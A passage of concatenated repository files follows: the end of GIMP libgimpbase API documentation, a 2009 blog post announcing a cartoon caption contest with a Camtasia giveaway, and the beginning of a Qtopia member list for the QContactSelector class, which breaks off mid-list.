href="libgimpbase-gimpenv.html#gimp-path-parse" title="gimp_path_parse ()"><code class="function">gimp_path_parse()</code></a>.</td> </tr></tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-path-get-user-writable-dir"></a><h3>gimp_path_get_user_writable_dir ()</h3> <pre class="programlisting"><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_path_get_user_writable_dir (<em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> *path</code></em>);</pre> <p> Note that you have to <a href="http://library.gnome.org/devel/glib/unstable/glib-Memory-Allocation.html#g-free"><code class="function">g_free()</code></a> the returned string. </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody> <tr> <td><p><span class="term"><em class="parameter"><code>path</code></em> :</span></p></td> <td>A list of directories as returned by <a class="link" href="libgimpbase-gimpenv.html#gimp-path-parse" title="gimp_path_parse ()"><code class="function">gimp_path_parse()</code></a>.</td> </tr> <tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>The first directory in <em class="parameter"><code>path</code></em> where the user has write permission.</td> </tr> </tbody> </table></div> </div> </div> </div> <div class="footer"> <hr> Generated by GTK-Doc V1.18</div> </body> </html>
_posts/2009/2009-06-09-day-6-cartoon-the-12-days-of-christmas-giveaway.html
tomjohnson1492/tomjohnson1492.github.io
--- layout: post title: Day 6 Cartoon [The 12 Days of Christmas Giveaway] date: 2009-06-09 10:28:02.000000000 -07:00 categories: - technical-writing tags: - cartoon - contest - giveaway - Giveaways status: publish published: true --- <p>Here's the cartoon for Day 6. The winner of this caption contest wins a free copy of <a onclick="javascript:urchinTracker ('/outbound/article/www.techsmith.com');" href="http://www.techsmith.com/camtasia.asp" target="_blank">Camtasia Studio</a>, courtesy of <a href="http://techsmith.com" target="_blank">Techsmith</a>.</p> <p><figure><a href="https://s3.us-west-1.wasabisys.com/idbwmedia.com/images/2009/06/contest6.gif"><img class="size-full wp-image-3742" title="Cartoon 6" src="https://s3.us-west-1.wasabisys.com/idbwmedia.com/images/contest61.gif" alt=" " width="480" height="639" /></a><figcaption>Cartoon 6</figcaption></figure></p> <p>Cartoon drawn by <a href="http://gryphonmountain.net" target="_blank">Ben Minson</a> at Grypon Mountain. For full details about the contest, see the initial <a href="https://idratherbewriting.com/2009/06/03/12-days-of-christmas-in-june-giveaway/">Giveaway post</a>.</p>
doc/html/qcontactselector-members.html
muromec/qtopia-ezx
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>List of All Members for QContactSelector</title> <link href="classic.css" rel="stylesheet" type="text/css" /> </head> <body> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td align="left" valign="top" width="32"><img src="images/qpelogo.png" align="left" width="32" height="32" border="0" /></td> <td width="1">&nbsp;&nbsp;</td><td class="postheader" valign="center"><a href="index.html"><font color="#004faf">Home</font></a>&nbsp;&middot; <a href="classes.html"><font color="#004faf">All&nbsp;Classes</font></a>&nbsp;&middot; <a href="groups.html"><font color="#004faf">Grouped Classes</font></a>&nbsp;&middot; <a href="annotated.html"><font color="#004faf">Annotated</font></a>&nbsp;&middot; <a href="functions.html"><font color="#004faf">Functions</font></a></td> <td align="right" valign="top"><img src="images/codeless.png" align="right" border="0" /></td></tr></table><h1 class="title">List of All Members for QContactSelector</h1> <p>This is the complete list of members for <a href="qcontactselector.html">QContactSelector</a>, including inherited members.</p> <p><table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr><td width="45%" valign="top"><ul> <li><div class="fn"/>enum <a href="qdialog.html#DialogCode-enum">DialogCode</a></li> <li><div class="fn"/>enum <a href="qpaintdevice.html#PaintDeviceMetric-enum">PaintDeviceMetric</a></li> <li><div class="fn"/>enum <a href="qwidget.html#RenderFlag-enum">RenderFlag</a></li> <li><div class="fn"/>typedef <a href="qwidget.html#RenderFlags-typedef">RenderFlags</a></li> <li><div class="fn"/><a href="qcontactselector.html#QContactSelector">QContactSelector</a> ( bool, QWidget * )</li> <li><div class="fn"/><a href="qcontactselector.html#QContactSelector-2">QContactSelector</a> ( QWidget * )</li> <li><div class="fn"/><a href="qcontactselector.html#dtor.QContactSelector">~QContactSelector</a> ()</li> <li><div class="fn"/><a href="qdialog.html#accept">accept</a> ()</li> <li><div class="fn"/><a href="qwidget.html#acceptDrops-prop">acceptDrops</a> () const</li> <li><div class="fn"/><a href="qdialog.html#accepted">accepted</a> ()</li> <li><div class="fn"/><a href="qwidget.html#accessibleDescription-prop">accessibleDescription</a> () const</li> <li><div class="fn"/><a href="qwidget.html#accessibleName-prop">accessibleName</a> () const</li> <li><div class="fn"/><a href="qwidget.html#actionEvent">actionEvent</a> ( QActionEvent * )</li> <li><div class="fn"/><a href="qwidget.html#actions">actions</a> () const</li> <li><div class="fn"/><a href="qwidget.html#activateWindow">activateWindow</a> ()</li> <li><div class="fn"/><a href="qwidget.html#addAction">addAction</a> ( QAction * )</li> <li><div class="fn"/><a href="qwidget.html#addActions">addActions</a> ( QList&lt;QAction *&gt; )</li> <li><div class="fn"/><a href="qwidget.html#adjustSize">adjustSize</a> ()</li> <li><div class="fn"/><a href="qwidget.html#autoFillBackground-prop">autoFillBackground</a> () const</li> <li><div class="fn"/><a href="qwidget.html#backgroundRole">backgroundRole</a> () const</li> <li><div class="fn"/><a href="qwidget.html#baseSize-prop">baseSize</a> () const</li> <li><div class="fn"/><a href="qobject.html#blockSignals">blockSignals</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#changeEvent">changeEvent</a> ( QEvent * )</li> <li><div class="fn"/><a href="qwidget.html#childAt">childAt</a> ( int, int ) const</li> <li><div class="fn"/><a href="qwidget.html#childAt-4">childAt</a> ( const QPoint &amp; ) const</li> <li><div class="fn"/><a href="qobject.html#childEvent">childEvent</a> ( QChildEvent * )</li> <li><div class="fn"/><a href="qobject.html#children">children</a> () const</li> <li><div class="fn"/><a href="qwidget.html#childrenRect-prop">childrenRect</a> () const</li> <li><div class="fn"/><a href="qwidget.html#childrenRegion-prop">childrenRegion</a> () const</li> <li><div class="fn"/><a href="qwidget.html#clearFocus">clearFocus</a> ()</li> <li><div class="fn"/><a href="qwidget.html#clearMask">clearMask</a> ()</li> <li><div class="fn"/><a href="qwidget.html#close">close</a> ()</li> <li><div class="fn"/><a href="qwidget.html#closeEvent">closeEvent</a> ( QCloseEvent * )</li> <li><div class="fn"/><a href="qobject.html#connect">connect</a> ( const QObject *, const char *, const QObject *, const char *, Qt::ConnectionType )</li> <li><div class="fn"/><a href="qobject.html#connect-2">connect</a> ( const QObject *, const char *, const char *, Qt::ConnectionType ) const</li> <li><div class="fn"/><a href="qobject.html#connectNotify">connectNotify</a> ( const char * )</li> <li><div class="fn"/><a href="qcontactselector.html#contactSelected">contactSelected</a> () const : bool</li> <li><div class="fn"/><a href="qcontactselector.html#contactSelected-2">contactSelected</a> ( const QContact &amp; )</li> <li><div class="fn"/><a href="qwidget.html#contentsRect">contentsRect</a> () const</li> <li><div class="fn"/><a href="qwidget.html#contextMenuEvent">contextMenuEvent</a> ( QContextMenuEvent * )</li> <li><div class="fn"/><a href="qwidget.html#contextMenuPolicy-prop">contextMenuPolicy</a> () const</li> <li><div class="fn"/><a href="qwidget.html#create">create</a> ( WId, bool, bool )</li> <li><div class="fn"/><a href="qwidget.html#cursor-prop">cursor</a> () const</li> <li><div class="fn"/><a href="qwidget.html#customContextMenuRequested">customContextMenuRequested</a> ( const QPoint &amp; )</li> <li><div class="fn"/><a href="qobject.html#customEvent">customEvent</a> ( QEvent * )</li> <li><div class="fn"/><a href="qobject.html#d_ptr-var">d_ptr</a> : </li> <li><div class="fn"/><a href="qobject.html#deleteLater">deleteLater</a> ()</li> <li><div class="fn"/><a href="qpaintdevice.html#depth">depth</a> () const</li> <li><div class="fn"/><a href="qwidget.html#destroy">destroy</a> ( bool, bool )</li> <li><div class="fn"/><a href="qobject.html#destroyed">destroyed</a> ( QObject * )</li> <li><div class="fn"/><a href="qobject.html#disconnect">disconnect</a> ( const QObject *, const char *, const QObject *, const char * )</li> <li><div class="fn"/><a href="qobject.html#disconnect-2">disconnect</a> ( const char *, const QObject *, const char * )</li> <li><div class="fn"/><a href="qobject.html#disconnect-3">disconnect</a> ( const QObject *, const char * )</li> <li><div class="fn"/><a href="qobject.html#disconnectNotify">disconnectNotify</a> ( const char * )</li> <li><div class="fn"/><a href="qdialog.html#done">done</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#dragEnterEvent">dragEnterEvent</a> ( QDragEnterEvent * )</li> <li><div class="fn"/><a href="qwidget.html#dragLeaveEvent">dragLeaveEvent</a> ( QDragLeaveEvent * )</li> <li><div class="fn"/><a href="qwidget.html#dragMoveEvent">dragMoveEvent</a> ( QDragMoveEvent * )</li> <li><div class="fn"/><a href="qwidget.html#dropEvent">dropEvent</a> ( QDropEvent * )</li> <li><div class="fn"/><a href="qobject.html#dumpObjectInfo">dumpObjectInfo</a> ()</li> <li><div class="fn"/><a href="qobject.html#dumpObjectTree">dumpObjectTree</a> ()</li> <li><div class="fn"/><a href="qobject.html#dynamicPropertyNames">dynamicPropertyNames</a> () const</li> <li><div class="fn"/><a href="qwidget.html#ensurePolished">ensurePolished</a> () const</li> <li><div class="fn"/><a href="qwidget.html#enterEvent">enterEvent</a> ( QEvent * )</li> <li><div class="fn"/><a href="qwidget.html#event">event</a> ( QEvent * )</li> <li><div class="fn"/><a href="qcontactselector.html#eventFilter">eventFilter</a> ( QObject *, QEvent * ) : bool</li> <li><div class="fn"/><a href="qdialog.html#exec">exec</a> ()</li> <li><div class="fn"/><a href="qwidget.html#find">find</a> ( WId )</li> <li><div class="fn"/><a href="qobject.html#findChild">findChild</a> ( const QString &amp; ) const</li> <li><div class="fn"/><a href="qobject.html#findChildren">findChildren</a> ( const QString &amp; ) const</li> <li><div class="fn"/><a href="qobject.html#findChildren-2">findChildren</a> ( const QRegExp &amp; ) const</li> <li><div class="fn"/><a href="qdialog.html#finished">finished</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#focusInEvent">focusInEvent</a> ( QFocusEvent * )</li> <li><div class="fn"/><a href="qwidget.html#focusNextChild">focusNextChild</a> ()</li> <li><div class="fn"/><a href="qwidget.html#focusNextPrevChild">focusNextPrevChild</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#focusOutEvent">focusOutEvent</a> ( QFocusEvent * )</li> <li><div class="fn"/><a href="qwidget.html#focusPolicy-prop">focusPolicy</a> () const</li> <li><div class="fn"/><a href="qwidget.html#focusPreviousChild">focusPreviousChild</a> ()</li> <li><div class="fn"/><a href="qwidget.html#focusProxy">focusProxy</a> () const</li> <li><div class="fn"/><a href="qwidget.html#focusWidget">focusWidget</a> () const</li> <li><div class="fn"/><a href="qwidget.html#font-prop">font</a> () const</li> <li><div class="fn"/><a href="qwidget.html#fontInfo">fontInfo</a> () const</li> <li><div class="fn"/><a href="qwidget.html#fontMetrics">fontMetrics</a> () const</li> <li><div class="fn"/><a href="qwidget.html#foregroundRole">foregroundRole</a> () const</li> <li><div class="fn"/><a href="qwidget.html#frameGeometry-prop">frameGeometry</a> () const</li> <li><div class="fn"/><a href="qwidget.html#frameSize-prop">frameSize</a> () const</li> <li><div class="fn"/><a href="qwidget.html#geometry-prop">geometry</a> () const</li> <li><div class="fn"/><a href="qwidget.html#getContentsMargins">getContentsMargins</a> ( int *, int *, int *, int * ) const</li> <li><div class="fn"/><a href="qwidget.html#getDC">getDC</a> () const</li> <li><div class="fn"/><a href="qwidget.html#grabKeyboard">grabKeyboard</a> ()</li> <li><div class="fn"/><a href="qwidget.html#grabMouse">grabMouse</a> ()</li> <li><div class="fn"/><a href="qwidget.html#grabMouse-2">grabMouse</a> ( const QCursor &amp; )</li> <li><div class="fn"/><a href="qwidget.html#grabShortcut">grabShortcut</a> ( const QKeySequence &amp;, Qt::ShortcutContext )</li> <li><div class="fn"/><a href="qwidget.html#hasEditFocus">hasEditFocus</a> () const</li> <li><div class="fn"/><a href="qwidget.html#focus-prop">hasFocus</a> () const</li> <li><div class="fn"/><a href="qwidget.html#mouseTracking-prop">hasMouseTracking</a> () const</li> <li><div class="fn"/><a href="qwidget.html#height-prop">height</a> () const</li> <li><div class="fn"/><a href="qwidget.html#heightForWidth">heightForWidth</a> ( int ) const</li> <li><div class="fn"/><a href="qpaintdevice.html#heightMM">heightMM</a> () const</li> <li><div class="fn"/><a href="qwidget.html#hide">hide</a> ()</li> <li><div class="fn"/><a href="qwidget.html#hideEvent">hideEvent</a> ( QHideEvent * )</li> <li><div class="fn"/><a href="qobject.html#inherits">inherits</a> ( const char * ) const</li> <li><div class="fn"/><a href="qwidget.html#inputContext">inputContext</a> ()</li> <li><div class="fn"/><a href="qwidget.html#inputMethodEvent">inputMethodEvent</a> ( QInputMethodEvent * )</li> <li><div class="fn"/><a href="qwidget.html#inputMethodQuery">inputMethodQuery</a> ( Qt::InputMethodQuery ) const</li> <li><div class="fn"/><a href="qwidget.html#insertAction">insertAction</a> ( QAction *, QAction * )</li> <li><div class="fn"/><a href="qwidget.html#insertActions">insertActions</a> ( QAction *, QList&lt;QAction *&gt; )</li> <li><div class="fn"/><a href="qobject.html#installEventFilter">installEventFilter</a> ( QObject * )</li> <li><div class="fn"/><a href="qwidget.html#isActiveWindow-prop">isActiveWindow</a> () const</li> <li><div class="fn"/><a href="qwidget.html#isAncestorOf">isAncestorOf</a> ( const QWidget * ) const</li> <li><div class="fn"/><a href="qwidget.html#enabled-prop">isEnabled</a> () const</li> <li><div class="fn"/><a href="qwidget.html#isEnabledTo">isEnabledTo</a> ( QWidget * ) const</li> <li><div class="fn"/><a href="qwidget.html#fullScreen-prop">isFullScreen</a> () const</li> <li><div class="fn"/><a href="qwidget.html#isHidden">isHidden</a> () const</li> <li><div class="fn"/><a href="qwidget.html#maximized-prop">isMaximized</a> () const</li> <li><div class="fn"/><a href="qwidget.html#minimized-prop">isMinimized</a> () const</li> <li><div class="fn"/><a href="qwidget.html#modal-prop">isModal</a> () const</li> <li><div class="fn"/><a href="qdialog.html#sizeGripEnabled-prop">isSizeGripEnabled</a> () const</li> <li><div class="fn"/><a href="qwidget.html#visible-prop">isVisible</a> () const</li> <li><div class="fn"/><a href="qwidget.html#isVisibleTo">isVisibleTo</a> ( QWidget * ) const</li> <li><div class="fn"/><a href="qobject.html#isWidgetType">isWidgetType</a> () const</li> <li><div class="fn"/><a href="qwidget.html#isWindow">isWindow</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowModified-prop">isWindowModified</a> () const</li> <li><div class="fn"/><a href="qwidget.html#keyPressEvent">keyPressEvent</a> ( QKeyEvent * )</li> <li><div class="fn"/><a href="qwidget.html#keyReleaseEvent">keyReleaseEvent</a> ( QKeyEvent * )</li> <li><div class="fn"/><a href="qwidget.html#keyboardGrabber">keyboardGrabber</a> ()</li> <li><div class="fn"/><a href="qobject.html#killTimer">killTimer</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#layout">layout</a> () const</li> <li><div class="fn"/><a href="qwidget.html#layoutDirection-prop">layoutDirection</a> () const</li> <li><div class="fn"/><a href="qwidget.html#leaveEvent">leaveEvent</a> ( QEvent * )</li> <li><div class="fn"/><a href="qwidget.html#locale-prop">locale</a> () const</li> <li><div class="fn"/><a href="qpaintdevice.html#logicalDpiX">logicalDpiX</a> () const</li> <li><div class="fn"/><a href="qpaintdevice.html#logicalDpiY">logicalDpiY</a> () const</li> <li><div class="fn"/><a href="qwidget.html#lower">lower</a> ()</li> <li><div class="fn"/><a href="qwidget.html#macCGHandle">macCGHandle</a> () const</li> <li><div class="fn"/><a href="qwidget.html#macEvent">macEvent</a> ( EventHandlerCallRef, EventRef )</li> <li><div class="fn"/><a href="qwidget.html#macQDHandle">macQDHandle</a> () const</li> <li><div class="fn"/><a href="qwidget.html#mapFrom">mapFrom</a> ( QWidget *, const QPoint &amp; ) const</li> <li><div class="fn"/><a href="qwidget.html#mapFromGlobal">mapFromGlobal</a> ( const QPoint &amp; ) const</li> <li><div class="fn"/><a href="qwidget.html#mapFromParent">mapFromParent</a> ( const QPoint &amp; ) const</li> <li><div class="fn"/><a href="qwidget.html#mapTo">mapTo</a> ( QWidget *, const QPoint &amp; ) const</li> <li><div class="fn"/><a href="qwidget.html#mapToGlobal">mapToGlobal</a> ( const QPoint &amp; ) const</li> <li><div class="fn"/><a href="qwidget.html#mapToParent">mapToParent</a> ( const QPoint &amp; ) const</li> <li><div class="fn"/><a href="qwidget.html#mask">mask</a> () const</li> <li><div class="fn"/><a href="qwidget.html#maximumHeight-prop">maximumHeight</a> () const</li> <li><div class="fn"/><a href="qwidget.html#maximumSize-prop">maximumSize</a> () const</li> <li><div class="fn"/><a href="qwidget.html#maximumWidth-prop">maximumWidth</a> () const</li> <li><div class="fn"/><a href="qobject.html#metaObject">metaObject</a> () const</li> <li><div class="fn"/><a href="qwidget.html#metric">metric</a> ( PaintDeviceMetric ) const</li> <li><div class="fn"/><a href="qwidget.html#minimumHeight-prop">minimumHeight</a> () const</li> <li><div class="fn"/><a href="qwidget.html#minimumSize-prop">minimumSize</a> () const</li> <li><div class="fn"/><a href="qwidget.html#minimumSizeHint-prop">minimumSizeHint</a> () const</li> <li><div class="fn"/><a href="qwidget.html#minimumWidth-prop">minimumWidth</a> () const</li> <li><div class="fn"/><a href="qwidget.html#mouseDoubleClickEvent">mouseDoubleClickEvent</a> ( QMouseEvent * )</li> <li><div class="fn"/><a href="qwidget.html#mouseGrabber">mouseGrabber</a> ()</li> <li><div class="fn"/><a href="qwidget.html#mouseMoveEvent">mouseMoveEvent</a> ( QMouseEvent * )</li> <li><div class="fn"/><a href="qwidget.html#mousePressEvent">mousePressEvent</a> ( QMouseEvent * )</li> <li><div class="fn"/><a href="qwidget.html#mouseReleaseEvent">mouseReleaseEvent</a> ( QMouseEvent * )</li> <li><div class="fn"/><a href="qwidget.html#pos-prop">move</a> ( const QPoint &amp; )</li> <li><div class="fn"/><a href="qwidget.html#pos-prop">move</a> ( int, int )</li> <li><div class="fn"/><a href="qwidget.html#moveEvent">moveEvent</a> ( QMoveEvent * )</li> <li><div class="fn"/><a href="qobject.html#moveToThread">moveToThread</a> ( QThread * )</li> <li><div class="fn"/><a href="qcontactselector.html#newContactSelected">newContactSelected</a> () const : bool</li> <li><div class="fn"/><a href="qwidget.html#nextInFocusChain">nextInFocusChain</a> () const</li> <li><div class="fn"/><a href="qwidget.html#normalGeometry-prop">normalGeometry</a> () const</li> <li><div class="fn"/><a href="qpaintdevice.html#numColors">numColors</a> () const</li> <li><div class="fn"/><a href="qobject.html#objectName-prop">objectName</a> () const</li> <li><div class="fn"/><a href="qwidget.html#overrideWindowFlags">overrideWindowFlags</a> ( QFlags&lt;Qt::WindowType&gt; )</li> <li><div class="fn"/><a href="qwidget.html#paintEngine">paintEngine</a> () const</li> <li><div class="fn"/><a href="qwidget.html#paintEvent">paintEvent</a> ( QPaintEvent * )</li> <li><div class="fn"/><a href="qpaintdevice.html#painters-var">painters</a> : </li> <li><div class="fn"/><a href="qpaintdevice.html#paintingActive">paintingActive</a> () const</li> <li><div class="fn"/><a href="qwidget.html#palette-prop">palette</a> () const</li> </ul></td><td valign="top"><ul> <li><div class="fn"/><a href="qobject.html#parent">parent</a> () const</li> <li><div class="fn"/><a href="qwidget.html#parentWidget">parentWidget</a> () const</li> <li><div class="fn"/><a href="qpaintdevice.html#physicalDpiX">physicalDpiX</a> () const</li> <li><div class="fn"/><a href="qpaintdevice.html#physicalDpiY">physicalDpiY</a> () const</li> <li><div class="fn"/><a href="qwidget.html#pos-prop">pos</a> () const</li> <li><div class="fn"/><a href="qobject.html#property">property</a> ( const char * ) const</li> <li><div class="fn"/><a href="qwidget.html#qwsEvent">qwsEvent</a> ( QWSEvent * )</li> <li><div class="fn"/><a href="qwidget.html#raise">raise</a> ()</li> <li><div class="fn"/><a href="qobject.html#receivers">receivers</a> ( const char * ) const</li> <li><div class="fn"/><a href="qwidget.html#rect-prop">rect</a> () const</li> <li><div class="fn"/><a href="qdialog.html#reject">reject</a> ()</li> <li><div class="fn"/><a href="qdialog.html#rejected">rejected</a> ()</li> <li><div class="fn"/><a href="qwidget.html#releaseDC">releaseDC</a> ( HDC ) const</li> <li><div class="fn"/><a href="qwidget.html#releaseKeyboard">releaseKeyboard</a> ()</li> <li><div class="fn"/><a href="qwidget.html#releaseMouse">releaseMouse</a> ()</li> <li><div class="fn"/><a href="qwidget.html#releaseShortcut">releaseShortcut</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#removeAction">removeAction</a> ( QAction * )</li> <li><div class="fn"/><a href="qobject.html#removeEventFilter">removeEventFilter</a> ( QObject * )</li> <li><div class="fn"/><a href="qwidget.html#render">render</a> ( QPaintDevice *, const QPoint &amp;, const QRegion &amp;, QFlags&lt;QWidget::RenderFlag&gt; )</li> <li><div class="fn"/><a href="qwidget.html#repaint">repaint</a> ()</li> <li><div class="fn"/><a href="qwidget.html#repaint-6">repaint</a> ( int, int, int, int )</li> <li><div class="fn"/><a href="qwidget.html#repaint-7">repaint</a> ( const QRect &amp; )</li> <li><div class="fn"/><a href="qwidget.html#repaint-8">repaint</a> ( const QRegion &amp; )</li> <li><div class="fn"/><a href="qwidget.html#resetInputContext">resetInputContext</a> ()</li> <li><div class="fn"/><a href="qwidget.html#size-prop">resize</a> ( const QSize &amp; )</li> <li><div class="fn"/><a href="qwidget.html#size-prop">resize</a> ( int, int )</li> <li><div class="fn"/><a href="qwidget.html#resizeEvent">resizeEvent</a> ( QResizeEvent * )</li> <li><div class="fn"/><a href="qwidget.html#restoreGeometry">restoreGeometry</a> ( const QByteArray &amp; )</li> <li><div class="fn"/><a href="qdialog.html#result">result</a> () const</li> <li><div class="fn"/><a href="qwidget.html#saveGeometry">saveGeometry</a> () const</li> <li><div class="fn"/><a href="qwidget.html#scroll">scroll</a> ( int, int )</li> <li><div class="fn"/><a href="qwidget.html#scroll-2">scroll</a> ( int, int, const QRect &amp; )</li> <li><div class="fn"/><a href="qcontactselector.html#selectedContact">selectedContact</a> () const : QContact</li> <li><div class="fn"/><a href="qcontactselector.html#selectedText">selectedText</a> () const : QString</li> <li><div class="fn"/><a href="qobject.html#sender">sender</a> () const</li> <li><div class="fn"/><a href="qwidget.html#acceptDrops-prop">setAcceptDrops</a> ( bool )</li> <li><div class="fn"/><a href="qcontactselector.html#setAcceptTextEnabled">setAcceptTextEnabled</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#accessibleDescription-prop">setAccessibleDescription</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#accessibleName-prop">setAccessibleName</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setAttribute">setAttribute</a> ( Qt::WidgetAttribute, bool )</li> <li><div class="fn"/><a href="qwidget.html#autoFillBackground-prop">setAutoFillBackground</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#setBackgroundRole">setBackgroundRole</a> ( QPalette::ColorRole )</li> <li><div class="fn"/><a href="qwidget.html#baseSize-prop">setBaseSize</a> ( const QSize &amp; )</li> <li><div class="fn"/><a href="qwidget.html#baseSize-prop">setBaseSize</a> ( int, int )</li> <li><div class="fn"/><a href="qwidget.html#setContentsMargins">setContentsMargins</a> ( int, int, int, int )</li> <li><div class="fn"/><a href="qwidget.html#contextMenuPolicy-prop">setContextMenuPolicy</a> ( Qt::ContextMenuPolicy )</li> <li><div class="fn"/><a href="qcontactselector.html#setCreateNewContactEnabled">setCreateNewContactEnabled</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#cursor-prop">setCursor</a> ( const QCursor &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setDisabled">setDisabled</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#setEditFocus">setEditFocus</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#enabled-prop">setEnabled</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#setFixedHeight">setFixedHeight</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#setFixedSize">setFixedSize</a> ( const QSize &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setFixedSize-2">setFixedSize</a> ( int, int )</li> <li><div class="fn"/><a href="qwidget.html#setFixedWidth">setFixedWidth</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#setFocus">setFocus</a> ( Qt::FocusReason )</li> <li><div class="fn"/><a href="qwidget.html#setFocus-2">setFocus</a> ()</li> <li><div class="fn"/><a href="qwidget.html#focusPolicy-prop">setFocusPolicy</a> ( Qt::FocusPolicy )</li> <li><div class="fn"/><a href="qwidget.html#setFocusProxy">setFocusProxy</a> ( QWidget * )</li> <li><div class="fn"/><a href="qwidget.html#font-prop">setFont</a> ( const QFont &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setForegroundRole">setForegroundRole</a> ( QPalette::ColorRole )</li> <li><div class="fn"/><a href="qwidget.html#geometry-prop">setGeometry</a> ( const QRect &amp; )</li> <li><div class="fn"/><a href="qwidget.html#geometry-prop">setGeometry</a> ( int, int, int, int )</li> <li><div class="fn"/><a href="qwidget.html#setHidden">setHidden</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#setInputContext">setInputContext</a> ( QInputContext * )</li> <li><div class="fn"/><a href="qwidget.html#setLayout">setLayout</a> ( QLayout * )</li> <li><div class="fn"/><a href="qwidget.html#layoutDirection-prop">setLayoutDirection</a> ( Qt::LayoutDirection )</li> <li><div class="fn"/><a href="qwidget.html#locale-prop">setLocale</a> ( const QLocale &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setMask">setMask</a> ( const QBitmap &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setMask-2">setMask</a> ( const QRegion &amp; )</li> <li><div class="fn"/><a href="qwidget.html#maximumHeight-prop">setMaximumHeight</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#maximumSize-prop">setMaximumSize</a> ( const QSize &amp; )</li> <li><div class="fn"/><a href="qwidget.html#maximumSize-prop">setMaximumSize</a> ( int, int )</li> <li><div class="fn"/><a href="qwidget.html#maximumWidth-prop">setMaximumWidth</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#minimumHeight-prop">setMinimumHeight</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#minimumSize-prop">setMinimumSize</a> ( const QSize &amp; )</li> <li><div class="fn"/><a href="qwidget.html#minimumSize-prop">setMinimumSize</a> ( int, int )</li> <li><div class="fn"/><a href="qwidget.html#minimumWidth-prop">setMinimumWidth</a> ( int )</li> <li><div class="fn"/><a href="qdialog.html#modal-prop">setModal</a> ( bool )</li> <li><div class="fn"/><a href="qcontactselector.html#setModel">setModel</a> ( QContactModel * )</li> <li><div class="fn"/><a href="qwidget.html#mouseTracking-prop">setMouseTracking</a> ( bool )</li> <li><div class="fn"/><a href="qobject.html#objectName-prop">setObjectName</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#palette-prop">setPalette</a> ( const QPalette &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setParent">setParent</a> ( QWidget * )</li> <li><div class="fn"/><a href="qwidget.html#setParent-2">setParent</a> ( QWidget *, QFlags&lt;Qt::WindowType&gt; )</li> <li><div class="fn"/><a href="qobject.html#setProperty">setProperty</a> ( const char *, const QVariant &amp; )</li> <li><div class="fn"/><a href="qdialog.html#setResult">setResult</a> ( int )</li> <li><div class="fn"/><a href="qwidget.html#setShortcutAutoRepeat">setShortcutAutoRepeat</a> ( int, bool )</li> <li><div class="fn"/><a href="qwidget.html#setShortcutEnabled">setShortcutEnabled</a> ( int, bool )</li> <li><div class="fn"/><a href="qdialog.html#sizeGripEnabled-prop">setSizeGripEnabled</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#sizeIncrement-prop">setSizeIncrement</a> ( const QSize &amp; )</li> <li><div class="fn"/><a href="qwidget.html#sizeIncrement-prop">setSizeIncrement</a> ( int, int )</li> <li><div class="fn"/><a href="qwidget.html#sizePolicy-prop">setSizePolicy</a> ( QSizePolicy )</li> <li><div class="fn"/><a href="qwidget.html#sizePolicy-prop">setSizePolicy</a> ( QSizePolicy::Policy, QSizePolicy::Policy )</li> <li><div class="fn"/><a href="qwidget.html#statusTip-prop">setStatusTip</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setStyle">setStyle</a> ( QStyle * )</li> <li><div class="fn"/><a href="qwidget.html#styleSheet-prop">setStyleSheet</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setTabOrder">setTabOrder</a> ( QWidget *, QWidget * )</li> <li><div class="fn"/><a href="qwidget.html#toolTip-prop">setToolTip</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#updatesEnabled-prop">setUpdatesEnabled</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#visible-prop">setVisible</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#whatsThis-prop">setWhatsThis</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#windowFlags-prop">setWindowFlags</a> ( QFlags&lt;Qt::WindowType&gt; )</li> <li><div class="fn"/><a href="qwidget.html#windowIcon-prop">setWindowIcon</a> ( const QIcon &amp; )</li> <li><div class="fn"/><a href="qwidget.html#windowIconText-prop">setWindowIconText</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#windowModality-prop">setWindowModality</a> ( Qt::WindowModality )</li> <li><div class="fn"/><a 